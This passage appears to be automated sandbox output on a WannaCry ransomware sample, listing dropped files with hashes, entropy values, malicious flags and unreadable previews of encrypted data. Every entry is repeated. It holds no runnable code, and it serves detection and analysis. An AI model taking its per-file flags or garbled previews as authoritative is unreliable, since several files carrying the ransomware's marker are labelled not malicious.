                                                                                      Preview:WANACRY!......#.2.......x!.v.q\Uk..!.s....[...-..8.....gxL.....7.r....\...f.[.."^....0.z..A.>"...).+d..L.@.."$(..0..=K.D....P....e..).VS.JV.].V..GvB>...1.J.....]..an4.0.y.lF.k....).!e.0n.P...\...(.N...z.z...........KLp..z.s...[..rx..(M.W.fd....(oi/eK..h...*Nr............a.ey.......9.qQ2.;.`(....u.].A..Z6.d~.ef.+n.#6(/E\!G....d....4........N.2.~...'....vN).i...TG.-....C.G.!M.!.E."R7.w.n.{..9._+....zLC.+.5W.Q1....}...hl...F..b..8.J...W...._.U.P.(..5....X.pH.`T9....$Q..).........H/.&...3h....P..xLb....<p....g......E?..Q.zJd.e`....2.f2m.X.]..cU/.6....=.7..b...b.......~..B.zs"P../=.J....._/...Z\.%..K.Hx........G....?7P.....xA._....u.D..B.`..y.)W.|P....P....-...xM......W...O_..*0..%(.....O...wUU#.4....H........e.:.4q.q..k....u.2:."#|..Q^e+..V....c.^M..'.{.z)R.c....m..5.*...R.)!.#.........'..........C.K.z[aj;]%..V..:nL..3p....i........o..'E.z...*9...a+rx.8jvTt...0...+.4..(.)...L..D.<<....i.. v........Q.g........?......?. .@&xuv..m..^...D.^..;.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1256
                                                                                      Entropy (8bit):7.828581360188889
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk+NMasFK8yhblQHs0Aabc6egY3cMS7O1m+YgPVspT76kI01:bk++HK8iJX0tcPg6TDapPHI01
                                                                                      MD5:98900F13C39363F67B00944F1356C575
                                                                                      SHA1:D3460CFB63EB509AA8AE5EE5ADE8D80E52E01CA5
                                                                                      SHA-256:2FAD58F04B8BB5BB3C647BAFFDE30AE50F086E1FAACF2D6468825E6E163CAC1E
                                                                                      SHA-512:8217932A4ABF526A11C948CB28924FB643B7D683F9512E1C155843729193C9593AE76A62B654D707914548F05A9CA58004F1DA91493EAF987A8F54688A640762
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....dS......\,..S......E....%....D.....F.UwM.ovUB3tY.!l]A.....\...'.H.5....7..36....}..7..,i..*.....hz.......(.Gzu..l....R.+.\.:*......3.D.....'5..x5..t&).....Ef4>=.......?z.,."....;..j....r.(...<.W.......!.\ ...T..L.y....r8|.1....*.5.y.SK.s..............p...P........DY. .Wv.u..hPhG...5.#.^....;...'.]3}..c...#.Z..'.......|"Cf.zm1l{pl..z=.sL.r.;.Ky.E....5S..^...n#.4./...ev...v. .N.....{..`w..?..^<..-I..5..........h#...~....<w../{._ N\w....|l..e.,I.."I..oL.....Oh%.[.....W....Q..hf..........L..^...24......).L&[...w......N.....p....$#.~..R......k w..TX...........~....f...dh..t[.Iv.z......1...'...L\.T.e.].&....}..0.D.f0..l^...S.Ey..3...............}.!g...N...~.X..t.s..].7qS.$)...|.^.N...c...[mw..W.d..o].,...El..e..a..f.......J../.=..;A.{U...l..Z..n%4.[.O..o&...=...!~....#....`J..jt^..B.a.....fkS..^[.c..P^.8.].....3..q.v...D...=.8........f...B...l....b.n:..-.vl..Ec..&Z....@L..[.5...(F.....3...#T>g3.....<..-o...)._..}.o.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1256
                                                                                      Entropy (8bit):7.828581360188889
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk+NMasFK8yhblQHs0Aabc6egY3cMS7O1m+YgPVspT76kI01:bk++HK8iJX0tcPg6TDapPHI01
                                                                                      MD5:98900F13C39363F67B00944F1356C575
                                                                                      SHA1:D3460CFB63EB509AA8AE5EE5ADE8D80E52E01CA5
                                                                                      SHA-256:2FAD58F04B8BB5BB3C647BAFFDE30AE50F086E1FAACF2D6468825E6E163CAC1E
                                                                                      SHA-512:8217932A4ABF526A11C948CB28924FB643B7D683F9512E1C155843729193C9593AE76A62B654D707914548F05A9CA58004F1DA91493EAF987A8F54688A640762
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....dS......\,..S......E....%....D.....F.UwM.ovUB3tY.!l]A.....\...'.H.5....7..36....}..7..,i..*.....hz.......(.Gzu..l....R.+.\.:*......3.D.....'5..x5..t&).....Ef4>=.......?z.,."....;..j....r.(...<.W.......!.\ ...T..L.y....r8|.1....*.5.y.SK.s..............p...P........DY. .Wv.u..hPhG...5.#.^....;...'.]3}..c...#.Z..'.......|"Cf.zm1l{pl..z=.sL.r.;.Ky.E....5S..^...n#.4./...ev...v. .N.....{..`w..?..^<..-I..5..........h#...~....<w../{._ N\w....|l..e.,I.."I..oL.....Oh%.[.....W....Q..hf..........L..^...24......).L&[...w......N.....p....$#.~..R......k w..TX...........~....f...dh..t[.Iv.z......1...'...L\.T.e.].&....}..0.D.f0..l^...S.Ey..3...............}.!g...N...~.X..t.s..].7qS.$)...|.^.N...c...[mw..W.d..o].,...El..e..a..f.......J../.=..;A.{U...l..Z..n%4.[.O..o&...=...!~....#....`J..jt^..B.a.....fkS..^[.c..P^.8.].....3..q.v...D...=.8........f...B...l....b.n:..-.vl..Ec..&Z....@L..[.5...(F.....3...#T>g3.....<..-o...)._..}.o.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1624
                                                                                      Entropy (8bit):7.852450516203315
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkTXdDNjV8oNBVjk8+6EBjJsypcQBTGLas0sQj+txn:o7t9fX1+68jJsypcQBTcaFpcxn
                                                                                      MD5:047F81622CF272C758BD9036E7061BBD
                                                                                      SHA1:F0E1543F503938984AF870BF0EEC099F6A0D68FF
                                                                                      SHA-256:5981018DCB757A5ECBEC4305CD50BECA21DC0E0FA2AA4AF3041D0F069B65334D
                                                                                      SHA-512:4F466D0A799910D4C1EC22EFA004F89CAEDF13AAC687378385AA667F151F5E709726F8BF1B150278BD1FEF780720A6CADE16599F6CF335E863D70CFD1E5083EA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......$K.3..<.u.6..f7Z.Q.=....z<.."..V.h..e..!.(d..MLV..C...e.O..t.u....q..6[V.7.`.0..........f.......ev....0p...V......t...o...l..@._17....B.1...*..;k9.G..s....u....W.[.wZ..O....._.:.b...^.........u..Xe.!...er......V.RO(.1...@........~.B...y..@.e....4.......t..7..q<#..x[...!..;~ry.^.d...1.=.&........r..+.m:...Mi.%...D"T2@.........T..;i..Ty...^r..m..k.]"8>.a.ec........h.....L9..E.w.......c..4"...`.L"wK..c....#OYZHr.<w2..5..........OW........{s..i7...[K.....o.+.o.(..--..`.o).G.._.....e..q+...!DV.V_{.....m|... q.X.&..i.Dv.d../..w(T.....=...wb{.^.....n.l... .wI..`.n..F...>..X....rb....x...WT{...B..8...K'0.&[X..*..M.....u..P. ....j....n..B.O*".._.=&..,....`8N?.:..0..l.`>..l=....:t...j.W .Aq.....(..^......n..........<..A.:S.....D.........Rh....f..9j..>.<Un.\&(..u../.....!L..........B^...m..3..E.Z(.c.Xo.<.."mZ...F T...!..l.WX{2..P!3&..Y.........!....:.GBY... ..A.+..g.m.t:v......_..1.R.F]............H..<..h..#`........\E.^..~
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1624
                                                                                      Entropy (8bit):7.852450516203315
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkTXdDNjV8oNBVjk8+6EBjJsypcQBTGLas0sQj+txn:o7t9fX1+68jJsypcQBTcaFpcxn
                                                                                      MD5:047F81622CF272C758BD9036E7061BBD
                                                                                      SHA1:F0E1543F503938984AF870BF0EEC099F6A0D68FF
                                                                                      SHA-256:5981018DCB757A5ECBEC4305CD50BECA21DC0E0FA2AA4AF3041D0F069B65334D
                                                                                      SHA-512:4F466D0A799910D4C1EC22EFA004F89CAEDF13AAC687378385AA667F151F5E709726F8BF1B150278BD1FEF780720A6CADE16599F6CF335E863D70CFD1E5083EA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......$K.3..<.u.6..f7Z.Q.=....z<.."..V.h..e..!.(d..MLV..C...e.O..t.u....q..6[V.7.`.0..........f.......ev....0p...V......t...o...l..@._17....B.1...*..;k9.G..s....u....W.[.wZ..O....._.:.b...^.........u..Xe.!...er......V.RO(.1...@........~.B...y..@.e....4.......t..7..q<#..x[...!..;~ry.^.d...1.=.&........r..+.m:...Mi.%...D"T2@.........T..;i..Ty...^r..m..k.]"8>.a.ec........h.....L9..E.w.......c..4"...`.L"wK..c....#OYZHr.<w2..5..........OW........{s..i7...[K.....o.+.o.(..--..`.o).G.._.....e..q+...!DV.V_{.....m|... q.X.&..i.Dv.d../..w(T.....=...wb{.^.....n.l... .wI..`.n..F...>..X....rb....x...WT{...B..8...K'0.&[X..*..M.....u..P. ....j....n..B.O*".._.=&..,....`8N?.:..0..l.`>..l=....:t...j.W .Aq.....(..^......n..........<..A.:S.....D.........Rh....f..9j..>.<Un.\&(..u../.....!L..........B^...m..3..E.Z(.c.Xo.<.."mZ...F T...!..l.WX{2..P!3&..Y.........!....:.GBY... ..A.+..g.m.t:v......_..1.R.F]............H..<..h..#`........\E.^..~
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2424
                                                                                      Entropy (8bit):7.910731668292909
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk9U4ZJqjG68xpy/GGyhODTdhbuP8HVbgpA+VUACpx7/iquOIm90YsQOt:o9TPSGdxpy/GG4iTrb28HVbwtmACHiqQ
                                                                                      MD5:C96C6ECF1F7AB169FB63D0386B6DDC4D
                                                                                      SHA1:5F1148D21F8C27C7C6A80D60639787D3A8C80BAB
                                                                                      SHA-256:848B6D5AA14C11A17997C76D84975D5E06E9925747A8CABD3886F10A85974F71
                                                                                      SHA-512:D03B471F2236130E094C4C63AE4A70A4AE02CD877F704F0C7B8217B6831CB8626E13E298BB7D69A3F828B03FE51B9666AE2D045492F50E2C618EAD0399B5FE30
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....<%...b...u...8?.bE....L..../.zS.L.....Li.......4.T....H.g..m..\.O].U.;..AS...g...W.A..Q..{...K.v.i.F8B;.....[......!jt.-.}S.pNP&..mv. ...z....u!)v.Q...<....[.b.6\..S.u...oa..aP....N.#......W.5|.,.,.K..`@.X......!g@~X9..e..V)M?>`V..g..m......^.......4T..db.k1.8A`OZ.....]./.......-p...Zl..10."N0ea.......+...,......2f.i.zQ..#I.<..k.MD.W..E..H..u.J..........@...X8Y+..!=.b...p..}...0T$.....|'b....eh.(.......1....6..._.C#'...$S..w....3.Ib).9...h..M..K.l.D./.h.....tv.=..K.E... .....z...r.m.7..hNN5..0B.!s=......sv......z|x.-.*.T..B.......J#G..[bs,..>...z+N..q....'.i.->.jwn.m..r.N.....%.dVl..!p.Lf._.&.`o.5.h..W.$r........(i..#R.."..F.F(.......P.k.bdk.;...........G...(....H.\2.Y*h9...JX.:...p...hG.....7.p....}..I..g...|.}..%..^N.9(;.....5pw..1X...d..rA;\RqlO..@.(Y..??...9'^W=..1..x....P...+..$HST...W...@Ff..M..8....Z.5;R.....r._......-...,.r.f.......[t..L.7(O.R.=....:.d..;V..#.2........;..Q.jm#S..^.u...o%.Z=N`it...o.w.....4..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2424
                                                                                      Entropy (8bit):7.910731668292909
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk9U4ZJqjG68xpy/GGyhODTdhbuP8HVbgpA+VUACpx7/iquOIm90YsQOt:o9TPSGdxpy/GG4iTrb28HVbwtmACHiqQ
                                                                                      MD5:C96C6ECF1F7AB169FB63D0386B6DDC4D
                                                                                      SHA1:5F1148D21F8C27C7C6A80D60639787D3A8C80BAB
                                                                                      SHA-256:848B6D5AA14C11A17997C76D84975D5E06E9925747A8CABD3886F10A85974F71
                                                                                      SHA-512:D03B471F2236130E094C4C63AE4A70A4AE02CD877F704F0C7B8217B6831CB8626E13E298BB7D69A3F828B03FE51B9666AE2D045492F50E2C618EAD0399B5FE30
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....<%...b...u...8?.bE....L..../.zS.L.....Li.......4.T....H.g..m..\.O].U.;..AS...g...W.A..Q..{...K.v.i.F8B;.....[......!jt.-.}S.pNP&..mv. ...z....u!)v.Q...<....[.b.6\..S.u...oa..aP....N.#......W.5|.,.,.K..`@.X......!g@~X9..e..V)M?>`V..g..m......^.......4T..db.k1.8A`OZ.....]./.......-p...Zl..10."N0ea.......+...,......2f.i.zQ..#I.<..k.MD.W..E..H..u.J..........@...X8Y+..!=.b...p..}...0T$.....|'b....eh.(.......1....6..._.C#'...$S..w....3.Ib).9...h..M..K.l.D./.h.....tv.=..K.E... .....z...r.m.7..hNN5..0B.!s=......sv......z|x.-.*.T..B.......J#G..[bs,..>...z+N..q....'.i.->.jwn.m..r.N.....%.dVl..!p.Lf._.&.`o.5.h..W.$r........(i..#R.."..F.F(.......P.k.bdk.;...........G...(....H.\2.Y*h9...JX.:...p...hG.....7.p....}..I..g...|.}..%..^N.9(;.....5pw..1X...d..rA;\RqlO..@.(Y..??...9'^W=..1..x....P...+..$HST...W...@Ff..M..8....Z.5;R.....r._......-...,.r.f.......[t..L.7(O.R.=....:.d..;V..#.2........;..Q.jm#S..^.u...o%.Z=N`it...o.w.....4..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):28904
                                                                                      Entropy (8bit):7.9938802799468265
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:JM48+4P6TgmH6Paz5KnfnGPPKFZSbIfq8V6IKw4XLdRdE/e+x:q4JTglRvG3gYbIfqIwm
                                                                                      MD5:F8C944C0B69BA76F8C8B292841CE1AB2
                                                                                      SHA1:1213FDAF016E01B0DAF7C37B68942899635C73D4
                                                                                      SHA-256:69507E20762C334128EDB48E554107779BB01B6FB14DA740FCA649180BD5769B
                                                                                      SHA-512:104E42CDB00B7CFF785CC66588B22F2ECB6C485AF194EAE39FA0428F76885F4AD1E0C5CAC3BFCA3C73A653C11A994E55D152C8E618CC4AA72AD919EEE7D73F8F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........#>\.*%,x..8)...y@......|...i.G..... ....1...[G{..+...).T[.....;...E.s.T.:....o.D.b...g....5....[y...g..L..2.Mbf.R}lZ..~..Xx..h%d*.84..A.'..A".A.^_..di.=n.O^.b.n.C.1...=Y.K`..r...~......R .K..J|....&..2*8.>Y.U......?5^.V.Rn.......?O..A.c?..9.....o.........v........@.h'. .z#n'.5.....T.Y..V':V%.....*.u.....1q. .w.f[.a..........HH..Vt...rw.l..*v\....!$@l.39.?.s.c}C.V...Q.2..q....pf.D.=.Qv..CuR6ET,{.:...S...9.......[........!.d...K..O.P.J.^.Y....Y...qY..se.n.:BiC...-..{...R....+.l(.#.4....=.."...D6(..^..R..-].._.-..9!t..B.m....{^|..Q.[.Bw..0..&i..u.m.0...'[..-v0.~0.......CA:?7....KUE..;...KO..#.*........5.......0]e6&...Pg.1b..e/...W.2..N.c.k...L..gWj......\1.._..&.. .d....332..1....2C.HUg.4....:7......s.e...6.zl..a..4.P..pU[.!0D....8..S+.ER.x...[l)....G0.......t....My,.....tB.^...3.C.N.P.?..@ +..k....j.._..3.[My"=.-..u....z|~..H"?..jr....W.....d..[..n.^{vu..u.94`..x.X.4\..a..c..9i...b....k.a.2H_.77.;.i..s.....h_...Q.z..Z.I^4.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):28904
                                                                                      Entropy (8bit):7.9938802799468265
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:JM48+4P6TgmH6Paz5KnfnGPPKFZSbIfq8V6IKw4XLdRdE/e+x:q4JTglRvG3gYbIfqIwm
                                                                                      MD5:F8C944C0B69BA76F8C8B292841CE1AB2
                                                                                      SHA1:1213FDAF016E01B0DAF7C37B68942899635C73D4
                                                                                      SHA-256:69507E20762C334128EDB48E554107779BB01B6FB14DA740FCA649180BD5769B
                                                                                      SHA-512:104E42CDB00B7CFF785CC66588B22F2ECB6C485AF194EAE39FA0428F76885F4AD1E0C5CAC3BFCA3C73A653C11A994E55D152C8E618CC4AA72AD919EEE7D73F8F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........#>\.*%,x..8)...y@......|...i.G..... ....1...[G{..+...).T[.....;...E.s.T.:....o.D.b...g....5....[y...g..L..2.Mbf.R}lZ..~..Xx..h%d*.84..A.'..A".A.^_..di.=n.O^.b.n.C.1...=Y.K`..r...~......R .K..J|....&..2*8.>Y.U......?5^.V.Rn.......?O..A.c?..9.....o.........v........@.h'. .z#n'.5.....T.Y..V':V%.....*.u.....1q. .w.f[.a..........HH..Vt...rw.l..*v\....!$@l.39.?.s.c}C.V...Q.2..q....pf.D.=.Qv..CuR6ET,{.:...S...9.......[........!.d...K..O.P.J.^.Y....Y...qY..se.n.:BiC...-..{...R....+.l(.#.4....=.."...D6(..^..R..-].._.-..9!t..B.m....{^|..Q.[.Bw..0..&i..u.m.0...'[..-v0.~0.......CA:?7....KUE..;...KO..#.*........5.......0]e6&...Pg.1b..e/...W.2..N.c.k...L..gWj......\1.._..&.. .d....332..1....2C.HUg.4....:7......s.e...6.zl..a..4.P..pU[.!0D....8..S+.ER.x...[l)....G0.......t....My,.....tB.^...3.C.N.P.?..@ +..k....j.._..3.[My"=.-..u....z|~..H"?..jr....W.....d..[..n.^{vu..u.94`..x.X.4\..a..c..9i...b....k.a.2H_.77.;.i..s.....h_...Q.z..Z.I^4.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2920
                                                                                      Entropy (8bit):7.934813566451858
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkEH/PCT2r+RLnYO+Vy0i8PlHrcmfsjTuChhvoHRr7kqwHEyGtUETz2xO+mlB5+Q:owSargnOPjVrjCtoHh7VwJGtU2z2xO+u
                                                                                      MD5:BB58AA2C71C8ED4FCF1A9F465C0D68C1
                                                                                      SHA1:C1A8AF59B7EA5355F93156201470386586F45DAD
                                                                                      SHA-256:B287853DDC1826E547D958C980033B40603CADE00FE5CE35832B9ECA96B10261
                                                                                      SHA-512:7F5019012C251BE2C9CD211DF3F787F8BEAA71DC05401085021D4982D210059C820B5D5924AD761BA59F12DF6D69FC0DE1EEDFB1095A1A8F890D07F1BFD4E52B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......di..9.kq.4....HD._....v...s....P@>.4..,...!......._!...A...C...gO}8..1.p.....^.L.D..F...............+.OQ..c.'.....k`....;H..2....}....A.ln.(..G.)A]a....]vC=........D..K..yS....."&..*w......F51I4..(..d..j#..'.|j^K..`).........Q.9F..6..go.|.z..~#....F.......Q..:.@...#-.S..\]......g`.gG.=...L.....v=Q{.0+qD...g..*.!U...&Rz........;..~A......).R...pR.d8..}..j.0.o.C.%..pV..D..^N-`.........qGh.i..........w...&..m8..l....E..,../...`38U5..6.,DC/.M.......Q.5.y.8...X.!.f.{.r5...U ..M..!......{..1.r..Lzn..+...Sw..G..>...~.%.U..,1e..3~...F..>...K.8.=...u]..n..?zw.fL.......s.....Z.4~.a.$..G...i....;..,*..1.5e(./......h.Y..z.x.u...7...i.\.*..^T...jS....^..p...W....+e.....U!I`eo.q.O.c.3..i/...7.......N....4.....`&B.?o...4wm.....=5.m$.#...81... |.r....$...........!.}..... ^.'k........]........-x.Fy....:<...Q..}HJ6..:.HX].o^b.4Ww...J...6}..\.u...{...l.6%:....._~...b.:T^...Z....q*...'.......9..{...r)..QI.."...^...8........9....H2YJZ..iK.h......S..U.Z..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2920
                                                                                      Entropy (8bit):7.934813566451858
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkEH/PCT2r+RLnYO+Vy0i8PlHrcmfsjTuChhvoHRr7kqwHEyGtUETz2xO+mlB5+Q:owSargnOPjVrjCtoHh7VwJGtU2z2xO+u
                                                                                      MD5:BB58AA2C71C8ED4FCF1A9F465C0D68C1
                                                                                      SHA1:C1A8AF59B7EA5355F93156201470386586F45DAD
                                                                                      SHA-256:B287853DDC1826E547D958C980033B40603CADE00FE5CE35832B9ECA96B10261
                                                                                      SHA-512:7F5019012C251BE2C9CD211DF3F787F8BEAA71DC05401085021D4982D210059C820B5D5924AD761BA59F12DF6D69FC0DE1EEDFB1095A1A8F890D07F1BFD4E52B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......di..9.kq.4....HD._....v...s....P@>.4..,...!......._!...A...C...gO}8..1.p.....^.L.D..F...............+.OQ..c.'.....k`....;H..2....}....A.ln.(..G.)A]a....]vC=........D..K..yS....."&..*w......F51I4..(..d..j#..'.|j^K..`).........Q.9F..6..go.|.z..~#....F.......Q..:.@...#-.S..\]......g`.gG.=...L.....v=Q{.0+qD...g..*.!U...&Rz........;..~A......).R...pR.d8..}..j.0.o.C.%..pV..D..^N-`.........qGh.i..........w...&..m8..l....E..,../...`38U5..6.,DC/.M.......Q.5.y.8...X.!.f.{.r5...U ..M..!......{..1.r..Lzn..+...Sw..G..>...~.%.U..,1e..3~...F..>...K.8.=...u]..n..?zw.fL.......s.....Z.4~.a.$..G...i....;..,*..1.5e(./......h.Y..z.x.u...7...i.\.*..^T...jS....^..p...W....+e.....U!I`eo.q.O.c.3..i/...7.......N....4.....`&B.?o...4wm.....=5.m$.#...81... |.r....$...........!.}..... ^.'k........]........-x.Fy....:<...Q..}HJ6..:.HX].o^b.4Ww...J...6}..\.u...{...l.6%:....._~...b.:T^...Z....q*...'.......9..{...r)..QI.."...^...8........9....H2YJZ..iK.h......S..U.Z..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1441224
                                                                                      Entropy (8bit):7.999872758147036
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:WvAI38NILlWYEwN242hL90VsfDEcv06bSAuLXnavv7NsjY5tC7cVSiHR:WvAkQ2WPm2D9fDqKiXavjNBmcEix
                                                                                      MD5:A80CA294174B5D27E4D8359EB93D3D00
                                                                                      SHA1:8A43EA9C59B7AAADF1954CFC73DA7B8324F32785
                                                                                      SHA-256:51232D70FF44227A654F7174777468E2B36AD776B4F97D9EAC3B4790D9842449
                                                                                      SHA-512:BF48EC0EC6448174C57A51603CB2B366C20716A185B0AFD2C3E2DF08E6F6C4A4CE73EE0A681AC993168EC268BA48855CB0D58A282F7ADBBD76C949FC85C32F9C
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....<... .......Y...z....W.O..-qX.O....%.^.#kJ$V.'.Kzy..HdHw..FI.....z.... |..v..9....K....1..T$.U..m.#..S..Qsk..... o..P....."l..I.l...n.)....._....DTO.|l.x.5.U=.sD..c....p.@..#...h...Z.Pl`D.-....e..d..K...|<8..'@..=aG.......=.3...M`.k.....ao............}...6&c.j..^^.....{..Y..].{......^x2...R-..Q.q.f.k.....-X..........j..}*b.\..@v.N...I.5.2..hU|..:.......8.#....|.|<.U.M..{.l...B..?...%X`..@e...l..>....hrS@........L.[......v...&..v.l.%1e.Q=W.=.J.j>.C...6.Em.1.f+)6LJEA`w.....Ks......`L.:......8v....D..W.D..[..."S.<H......%.....n..i+....>f....A..k2.....k.D'..q..Tb..@.....[pq_..%.........;.]..._W~..,_).G...".....*.-.mC......G..S ...N....r.=...R./..J.S......a..#'..B.D....EQ...M ..9S..9=...j..q.}..3.o.S.a..P.....I......6..zH...........dS..E......}}S..<............X.}........sV....[%....Q<.Z<...b....V.......|4.[...<...psD.\....\*.:@6.*^8......*...\.I..w.zW....d.0...-?.=....i.bI%..".E.R.D.>A.=..9vA..D.i2po.....Y...#.*i.Sy...........
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1441224
                                                                                      Entropy (8bit):7.999872758147036
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:WvAI38NILlWYEwN242hL90VsfDEcv06bSAuLXnavv7NsjY5tC7cVSiHR:WvAkQ2WPm2D9fDqKiXavjNBmcEix
                                                                                      MD5:A80CA294174B5D27E4D8359EB93D3D00
                                                                                      SHA1:8A43EA9C59B7AAADF1954CFC73DA7B8324F32785
                                                                                      SHA-256:51232D70FF44227A654F7174777468E2B36AD776B4F97D9EAC3B4790D9842449
                                                                                      SHA-512:BF48EC0EC6448174C57A51603CB2B366C20716A185B0AFD2C3E2DF08E6F6C4A4CE73EE0A681AC993168EC268BA48855CB0D58A282F7ADBBD76C949FC85C32F9C
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....<... .......Y...z....W.O..-qX.O....%.^.#kJ$V.'.Kzy..HdHw..FI.....z.... |..v..9....K....1..T$.U..m.#..S..Qsk..... o..P....."l..I.l...n.)....._....DTO.|l.x.5.U=.sD..c....p.@..#...h...Z.Pl`D.-....e..d..K...|<8..'@..=aG.......=.3...M`.k.....ao............}...6&c.j..^^.....{..Y..].{......^x2...R-..Q.q.f.k.....-X..........j..}*b.\..@v.N...I.5.2..hU|..:.......8.#....|.|<.U.M..{.l...B..?...%X`..@e...l..>....hrS@........L.[......v...&..v.l.%1e.Q=W.=.J.j>.C...6.Em.1.f+)6LJEA`w.....Ks......`L.:......8v....D..W.D..[..."S.<H......%.....n..i+....>f....A..k2.....k.D'..q..Tb..@.....[pq_..%.........;.]..._W~..,_).G...".....*.-.mC......G..S ...N....r.=...R./..J.S......a..#'..B.D....EQ...M ..9S..9=...j..q.}..3.o.S.a..P.....I......6..zH...........dS..E......}}S..<............X.}........sV....[%....Q<.Z<...b....V.......|4.[...<...psD.\....\*.:@6.*^8......*...\.I..w.zW....d.0...-?.=....i.bI%..".E.R.D.>A.=..9vA..D.i2po.....Y...#.*i.Sy...........
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2008
                                                                                      Entropy (8bit):7.9001042889229005
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkx2V/YcJy5N+C4TZ7x2APTgkDJSKGskNV2wOnFFTbc5nc:ox2JYcJyn+5T/2ggmRkNVGVync
                                                                                      MD5:749787C4EA9CC17EBA3C4E016096ADCA
                                                                                      SHA1:E53D15DD2D3692B0AD528056EE7A6A0C5BFCCF69
                                                                                      SHA-256:75DD9105792698E195F71B522FD2F96337A9EFFE1AB8465DF7DCD5F0270A54BF
                                                                                      SHA-512:CDB03707A9FE31188C893F46395AA240812C96A5975EA200DF3777E4DB9EFB98E37E0FEF5708C9383E0487239F7C5AA107B2E612E850FB0EADB2AFD830F741ED
                                                                                      Malicious:false
                                                                                      Reputation:low
